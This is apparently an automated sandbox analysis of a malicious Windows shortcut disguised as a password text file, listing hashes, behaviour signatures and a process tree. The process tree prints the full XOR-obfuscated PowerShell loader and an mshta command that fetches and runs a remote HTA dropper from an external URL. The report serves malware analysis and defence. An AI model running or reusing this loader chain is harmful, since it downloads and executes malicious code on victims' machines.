Analysis
- Max time kernel: 1634s
- Max time network: 1639s
- Platform: windows7_x64
- Resource: win7-20220414-en
- Submitted: 23-06-2022 16:06

Tasks
- Static task: static1
- Behavioral task: behavioral1
- Sample: password.txt.lnk
- Resource: win7-20220414-en (windows7_x64)
- 0 signatures
- 0 seconds
General
- Target: password.txt.lnk
- Size: 1KB
- MD5: ee5dc8a66298685a6f6790e32e1a006b
- SHA1: 8bd4a8e15b8c097283b67dd8201ed41e01cbe794
- SHA256: 65e7327a6f3efb230a4d61966182f1d1c592aa222f4f820afaca6617680d09bd
- SHA512: 8c0164d4576959d7d474cd39545db1564e459f0ab55e51df601d132d6667b41e8751d236a3850934b0575ae9c1e09e230019609669276d36849da40400f0613c
- Score: 10/10
Malware Config
Extracted
- Language: hta
- Source: hta.dropper
- URLs: https://wang-data-science.com/wp-content/themes/scapeshot/etest.hta
Signatures
- Blocklisted process makes network request (4 IoCs)
  Processes: mshta.exe
    flow  pid  process
    4     976  mshta.exe
    5     976  mshta.exe
    6     976  mshta.exe
    7     976  mshta.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Modifies Internet Explorer settings
  Processes: mshta.exe
    description  ioc                                                                                                     process
    Key created  \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main  mshta.exe
- Suspicious behavior: EnumeratesProcesses (1 IoCs)
  Processes: powershell.exe
    pid   process
    1624  powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes: powershell.exe
    description              pid   process
    Token: SeDebugPrivilege  1624  powershell.exe
- Suspicious use of WriteProcessMemory (6 IoCs)
  Processes: cmd.exe, powershell.exe
    description                       pid   process         target process
    PID 1628 wrote to memory of 1624  1628  cmd.exe         powershell.exe
    PID 1628 wrote to memory of 1624  1628  cmd.exe         powershell.exe
    PID 1628 wrote to memory of 1624  1628  cmd.exe         powershell.exe
    PID 1624 wrote to memory of 976   1624  powershell.exe  mshta.exe
    PID 1624 wrote to memory of 976   1624  powershell.exe  mshta.exe
    PID 1624 wrote to memory of 976   1624  powershell.exe  mshta.exe
Processes
- C:\Windows\system32\cmd.exe
  Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\password.txt.lnk
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $xrrCQEUf = [convert]::FromBase64String('PjIv');$rvIxkgme = [convert]::FromBase64String('GgQfAxZXHwMDBwRNWFgAFhkQWhMWAxZaBBQeEhkUElkUGBpYAAdaFBgZAxIZA1gDHxIaEgRYBBQWBxIEHxgDWBIDEgQDWR8DFg==');$BJtiaLic = -join($xrrCQEUf | % {[char] ($_ -bxor 0x77)});$uVgPreUS = -join ($rvIxkgme | % { [char] ($_ -bxor 0x77)});sal ABJmyxbD $BJtiaLic;ABJmyxbD $uVgPreUS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\mshta.exe
      Command line: "C:\Windows\system32\mshta.exe" https://wang-data-science.com/wp-content/themes/scapeshot/etest.hta
      - Blocklisted process makes network request
      - Modifies Internet Explorer settings
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Downloads
- memory/976-97-0x0000000000000000-mapping.dmp
- memory/1624-88-0x0000000000000000-mapping.dmp
- memory/1624-94-0x000007FEF3E70000-0x000007FEF49CD000-memory.dmp (filesize: 11.4MB)
- memory/1624-95-0x0000000002884000-0x0000000002887000-memory.dmp (filesize: 12KB)
- memory/1624-96-0x000000001B720000-0x000000001BA1F000-memory.dmp (filesize: 3.0MB)
- memory/1624-98-0x0000000002884000-0x0000000002887000-memory.dmp (filesize: 12KB)
- memory/1624-99-0x000000000288B000-0x00000000028AA000-memory.dmp (filesize: 124KB)
- memory/1628-54-0x000007FEFBA91000-0x000007FEFBA93000-memory.dmp (filesize: 8KB)